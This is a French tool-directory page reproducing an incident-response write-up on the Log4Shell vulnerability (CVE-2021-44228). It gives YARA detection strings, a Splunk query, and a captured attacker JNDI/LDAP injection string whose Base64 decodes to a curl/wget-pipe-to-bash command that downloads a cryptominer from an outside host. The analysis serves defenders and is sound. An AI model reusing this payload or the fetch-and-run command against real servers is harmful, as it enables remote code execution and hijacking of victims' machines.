Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44228-DFIR-Notes — CVE-2021-44228 Notes DFIR | Kitploit
Outils/GitHubGitHub/azeemering/cve-2021-44228-dfir-notes
Analyse des VulnérabilitésAnalyse de MalwareCriminalistique NumériqueRenseignement sur les MenacesApprentissage et ÉducationRéponse aux IncidentsAnalyse de Journaux
GitHubazeemering/cve-2021-44228-dfir-notes

CVE-2021-44228-DFIR-Notes

CVE-2021-44228 Notes DFIR

Voir le dépôt
72il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Notes DFIR sur CVE-2021-44228

En rentrant chez moi, j'ai reçu mes premiers messages concernant la vulnérabilité #log4shell.

Une vulnérabilité de haute sévérité (CVE-2021-44228) impactant plusieurs versions de l'utilitaire Apache Log4j 2 a été divulguée publiquement via le GitHub du projet le 9 décembre 2021. Cette vulnérabilité, découverte par Chen Zhaojun de l'équipe de sécurité cloud d'Alibaba, impacte les versions 2.0 à 2.14.1 d'Apache Log4j 2.

Je me suis plongé dedans en rentrant. Splunk4tw comme d'habitude.

Après la publication du premier exploit de preuve de concept sur GitHub, des acteurs malveillants ont commencé à scanner Internet à la recherche de systèmes vulnérables à cette faille de sécurité exploitable à distance sans nécessiter d'authentification. Ce que vous verrez ci-dessous fait partie de ces tentatives de scan et d'exploitation.

Mon premier réflexe est de voir si quelqu'un a publié une règle YARA initiale. Trouvée ici https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b (Merci Florian Roth)

Elle mentionne les éléments suivants pour les chaînes de détection : strings: $x1 = "${jndi:ldap:/" $x2 = "${jndi:rmi:/" $x3 = "${jndi:ldaps:/" $x4 = "${jndi:dns:/"

Je n'ai pas peur... abusons de quelques CPU et allons droit au but avec la pire recherche Splunk.

index=* jndi:ldap* (updated query with index=* "{lower:l}${lower:d}a${lower:p}")

J'ai des résultats dans mes logs IIS et dans les journaux d'événements Windows (édité) et beaucoup de tentatives bloquées dans les logs du pare-feu....

IIS : image

WINEVENTLOG : image

Vérification de l'adresse IP 45.155.205.233.....Saint-Pétersbourg, Russie.....quelle surprise. image

La chaîne trouvée ressemble à une chaîne malveillante obfusquée et encodée classique. Voyons ce qu'elle fait :

Décodons la chaîne Base64 avec cyberchef 2021-12-10 13:26:16 [redacted] GET / - 443 - xxx.xx.xxx.xx ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNDUuMzUuMTk1LjYzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE0NS4zNS4xOTUuNjM6ODApfGJhc2g=} http://[redacted]:80/ 200 0 0 171

image

(curl -s 45.155.xx.233:xxxx/145.xx.195.63:80||wget -q -O- 45.xx.205.233:xxxx/145.xx.xxx.63:80)|bash

Curl... exécuter un script shell, bash....OMG. Je commence à avoir une idée de ce que ce sale boulot va faire....

Exécutons la commande curl dans un sandbox :

image

368 lignes de code. (exécutez-le ici si vous voulez voir le script complet --> https://reqbin.com/c-ipejxywd

Quelques extraits :

image image image

Et après avoir terminé, il efface même les fichiers journaux... quelle surprise :

image

Il essaie en gros d'installer un malware appelé Kingsin qui est un mineur de crypto. Les cibles sont les systèmes nix. Assurez-vous de patcher vos systèmes car l'exploit sera probablement utilisé pour exécuter toutes sortes de charges utiles.

Merci à mes collègues Martijn d'Umbrio et Rob [édité] pour une soirée du vendredi à débattre sur WhatsApp à ce sujet. 00:09 heure d'aller au lit.

#MISES À JOUR et bonnes Ressources#

  • https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
  • https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
  • https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228

image

Télécharger l’outil